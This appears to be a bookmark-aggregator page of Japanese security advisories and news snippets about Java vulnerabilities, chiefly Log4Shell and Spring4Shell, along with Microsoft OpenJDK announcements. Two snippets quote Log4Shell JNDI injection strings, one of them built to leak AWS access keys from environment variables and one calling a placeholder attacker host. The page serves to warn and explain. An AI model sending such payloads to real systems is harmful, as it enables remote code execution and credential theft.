Oracle Java の脆弱性対策について(CVE-2022-21449等) | 情報セキュリティ | IPA 独立行政法人 情報処理推進機構
※追記すべき情報がある場合には、その都度このページを更新する予定です。 MyJVNバージョンチェッカによる最新バージョンのチェックが行えます。こちらからご利用ください。 概要 Oracle 社から Java SE に関する脆弱性が公表されています。 同社からは攻撃された場合の影響が大きい脆弱性であることがアナウンスされているため、できるだけ早急に修正プログラムを適用してください。 対象 サポートされている以下の Oracle 製品が対象です。 Oracle Java SE 18 Oracle Java SE 17.0.2 Oracle Java SE 11.0.14 Oracle Java SE 8 Update 321 Oracle Java SE 7 Update 331 対策 脆弱性の解消 - 修正プログラムの適用 - Oracle 社から提供されている最新版に更新してください。 J
「Spring4Shell」脆弱性、マイクロソフトが詳細を説明
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます Microsoftは米国時間4月5日、Java向けのアプリケーションフレームワーク「Spring Framework」に潜んでいることが最近報告された「Spring4Shell」脆弱性について、詳しく説明した。 同社は、「Microsoft Azure」クラウドサービスの顧客らに対してパッチの適用を呼びかけている。Spring4Shell(共通脆弱性識別子「CVE-2022-22965」)はリモードコード実行(RCE)攻撃につながる可能性のある脆弱性であり、「SpringShell」という名称でも呼ばれている。なおこれらの名称は、Javaのログ出力ライブラリー「Apache Log4j」で発見された「Log4Shell」脆弱性にちなんだ
【セキュリティ ニュース】行政サービスの共通認証「GビズID」が停止 - 「Spring4Shell」影響で(1ページ目 / 全1ページ):Security NEXT
デジタル庁は、行政サービスの共通認証サービス「GビズID」で利用するソフトウェアに脆弱性が見つかったとしてサービスの提供を一時停止した。 Javaフレームワーク「Spring Framework」のコアモジュールに脆弱性「Spring4Shell」が指摘されていることを受け、サービスの提供を一時停止し、メインテナンスを実施しているもの。 同脆弱性については実証コードが一時公開されており、特定アプリケーションの一部機能が影響受けると見られるが、脆弱性の詳細は明らかになっておらず、CVE番号なども採番されていない。 「GビズID」では、同脆弱性への対応が完了次第、サービスを再開するとアナウンスしている。 (Security NEXT - 2022/03/31 ) ツイート
Spring Frameworkの脆弱性 CVE-2022-22965(Spring4shell)についてまとめてみた - piyolog
2022年3月31日、Spring Frameworkに致命的な脆弱性が確認され、修正版が公開されました。ここでは関連する情報をまとめます。 1.何が起きたの? JDK9以上で実行されるSpringMVC、SpringWebFluxでリモートコード実行が可能な脆弱性(CVE-2022-22965)が確認された。脆弱性の通称にSpring4shellまたはSpringShellが用いられている。 Spring FrameworkはJavaで採用される主流なフレームワークの1つのため、Javaで実行されるWebアプリケーションで利用している可能性がある。 2022年3月31日時点で脆弱性のExploitコードが出回っており、関連するインターネット上の活動が既に報告されている。 2.脆弱性を悪用されると何が起きるの? 脆弱性を悪用された場合、リモートから任意コード実行が行われることで、機密情報の
Javaアプリフレームワーク「Spring」に複数の脆弱性報告--未確認情報の交錯も
印刷する メールで送る テキスト HTML 電子書籍 PDF ダウンロード テキスト 電子書籍 PDF クリップした記事をMyページから読むことができます Javaアプリケーションフレームワーク「Spring」において、サーバーレス実行環境の「Spring Cloud Function」で脆弱性が報告された。これとは別に「Spring Framework」コアにも深刻だとする脆弱性の存在が指摘され、情報が交錯している。 VMwareの情報によると、Spring Cloud Functionのバージョン3.1.6および3.2.2とサポートが終了している古いバージョンでは、ルーティング機能を有効にしている場合に、細工された「SpEL」によって、ローカルリソースへのアクセスを許容してしまう脆弱性(CVE-2022-22963)が存在する。 この脆弱性を修正したSpring Cloud Funct
Apache Log4j の脆弱性対策について(CVE-2021-44228) | 情報セキュリティ | IPA 独立行政法人 情報処理推進機構
※追記すべき情報がある場合には、その都度このページを更新する予定です 概要 Apache Log4j は、Apache Software Foundation がオープンソースで提供している Java ベースのロギングライブラリです。 この Apache Log4j において、遠隔の第三者が細工したデータを送る事で、任意のコマンドを実行される可能性があります。 本脆弱性を悪用したと思われる攻撃が観測されたとの情報があります。今後被害が拡大するおそれがあるため、至急、対策を実施してください。 2021 年 12 月 14 日 更新 本脆弱性を悪用したと思われる攻撃が国内で観測されたとの情報があります。今後被害が拡大するおそれがあるため、至急、対策を実施してください。
2021年12月に公表されたLog4jの脆弱性について
2021年12月10日ごろより、JavaベースのオープンソースのロギングライブラリのApache Log4jに関して複数の脆弱性が報告されております。JPCERT/CCでも本件について、注意喚起を発行し、適宜更新を行っております。 本記事では、2022年1月5日時点でのApache Log4jに関する脆弱性の状況をまとめています。 注意喚起の内容とあわせて、自組織でのApache Log4jへの対応状況の確認の参考にしていただけると幸いです。 1) 現在公表されている脆弱性 CVE-2021-44228 概要 Apache Log4jのJava Naming and Directory Interface(JNDI)機能に関する任意のコード実行の脆弱性 遠隔の第三者が細工した文字列を送信し、Log4jがログとして記録することで任意のコードを実行する可能性がある 影響バージョン Apache
Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 - JPCERT/CC Eyes
また、JPCERT/CCのハニーポットでは観測されていませんが、AWSのアクセスキー情報を環境変数から窃取しようとする以下の攻撃文字列が存在していることも確認しています。 ${jndi:ldap://${env:AWS_ACCESS_KEY}.(略)} 被害の確認および対処 log4j2は採用事例が非常に多く、また自身がlog4jをプログラムに取り込んだ覚えがなくとも、使用しているライブラリ内に内包されているケースも多くあるものと考えられます。影響確認においては、自組織で用いられているソフトウェア資産の整理もさることながら、既に不正なアクセスが行われているという想定のもと、システム内に不審なファイル等が配置されていないか、また不審な宛先に対して通信が発生していないか確認し、冷静にシステムのアップデートまた回避策の適用を実施していただきたいと思います。 参考情報 [1] Log4j Apac
【図解】Log4jの脆弱性 CVE-2021-44228 (Log4shell or LogJam) について
JNDI とはJava Naming and Directory Interface という、Java アプリケーションが DNS や LDAP 等のサービスを利用するための汎用的なインタフェース (ライブラリ) です。 Log4j と JNDI lookupApache Software Foundation が開発した、Java ベースのロギングに関するライブラリです。JNDI lookup という機能があり、書き込んだログの一部を自動で変数化します。今回はこの機能が悪用されています。 CVE-2021-44228 の攻撃シーケンスの例 攻撃者は脆弱性をトリガーするために http ヘッダの User-Agent に ${jndi:ldap://attacker.com/a} という文字列を埋め込み、http リクエストを送信します。脆弱性のあるサーバの Java App はその通信を
Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた - piyolog
2021年12月10日、Javaベースのログ出力ライブラリ「Apache Log4j」の2.x系バージョン(以降はLog4j2と記載)で確認された深刻な脆弱性を修正したバージョンが公開されました。セキュリティ関係組織では過去話題になったHeartbleedやShellshockと同レベルの脆弱性とも評価しています。ここでは関連する情報をまとめます。 1.何が起きたの? Javaベースのログ出力ライブラリLog4j2で深刻な脆弱性(CVE-2021-44228)を修正したバージョンが公開された。その後も修正が不完全であったことなどを理由に2件の脆弱性が修正された。 広く利用されているライブラリであるため影響を受ける対象が多く存在するとみられ、攻撃が容易であることから2014年のHeartbleed、Shellshock以来の危険性があるとみる向きもあり、The Apache Software
「やばすぎる」 Javaライブラリ「Log4j」にゼロデイ脆弱性、任意のリモートコードを実行可能 iCloudやSteam、Minecraftなど広範囲のJava製品に影響か
Webセキュリティ製品などを手掛ける米LunaSecの報告によると、Minecraftの他、ゲームプラットフォームのSteamやAppleの「iCloud」もこの脆弱性を持つことが分かっており、影響は広範囲に及ぶと考えられるという。 この脆弱性の影響があるのは、Log4jのバージョン2.0から2.14.1までと当初みられていたが、Log4jのGitHub上の議論では、1.x系も同様の脆弱性を抱えていることが報告されている。対策には、修正済みのバージョンである2.15.0-rc2へのアップデートが推奨されている。 セキュリティニュースサイト「Cyber Kendra」によれば、この脆弱性に対して付与されるCVE番号は「CVE-2021-44228」という。 脆弱性の報告を受け、Twitter上ではITエンジニアたちが続々反応。「やばすぎる」「思っていたよりずっとひどいバグだった」「なぜこんな
log4jの脆弱性について
log4jとはJava用のloggingライブラリだ。loggingライブラリというのはログとして記録すべき文字列を受け取り、それをどこかに出力するものだ。文字列の中身を通常のloggingライブラリは気にしない。 log4jが通常のloggingライブラリと違うのは、文字列の中身を見て、一部の文字列を変数とみなして置換することだ。これはlog4jのドキュメントではlookupと呼ばれている。 Log4j – Log4j 2 Lookups 例えばプログラムを実行中のJava runtimeのバージョンをログに含めたい場合は、"Java Runtime: ${java:runtime}"などとすると、"Java Runtgime: Java(TM) SE Runtime Environment (build 1.7.0_67-b01) from Oracle Corporation"などの
Microsoft Build OpenJDK の正式リリースを発表 - Qiita
この記事は ”Announcing General Availability of Microsoft Build of OpenJDK, May 25th, 2021 ”の翻訳記事です Microsoft Build の OpenJDK の一般提供開始を発表 マイクロソフトは Microsoft Build の OpenJDK の一般提供開始を発表できることを嬉しく思います。 Microsoft Build の OpenJDK は、オープンソースで、どこにでも、どなたでも無料でご利用いただける OpenJDK の新しいディストリビューションです。 マイクロソフト社内でも Java は数多く利用されており、50万を超える Java VM が社内で実行されています。Java Engineering Group は、Java エコシステムに貢献できることを非常に誇りに思っています。そして Li
マイクロソフトが無償でJavaの長期サポートを提供へ、「Microsoft Build of OpenJDK」をリリース
マイクロソフトが無償でJavaの長期サポートを提供へ、「Microsoft Build of OpenJDK」をリリース マイクロソフトは同社独自のOpenJDKディストリビューションとなる「Microsoft Build of OpenJDK」のプレビューリリースを発表しました。 Say hello to Microsoft Build of #OpenJDK! New Long-Term Support distribution of @OpenJDK for your @Java workloads, in the #Cloud and everywhere else! Visit https://t.co/VPM63V5M2H to learn more. pic.twitter.com/8MBIFu1PF5 — Java at Microsoft (@JavaAtMicrosof
Google Sites: Sign-in
Not your computer? Use a private browsing window to sign in. Learn more about using Guest mode
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Announcing Microsoft Build of OpenJDK 21 - Microsoft for Java Developers
Log4j –
「Log4j」の脆弱性によるセキュリティ危機には、さらに深刻な“第2波”がやってくる
/blog/2021/12/microsofts-response-to-cve-2021-44228-apache-log4j2/
「Oracle Java」のライセンスが変更 ~無償利用は個人での開発・テスト・デモ目的のみに/「Java 8」の無償アップデートは新ライセンス下で少なくとも2020年終わりまで継続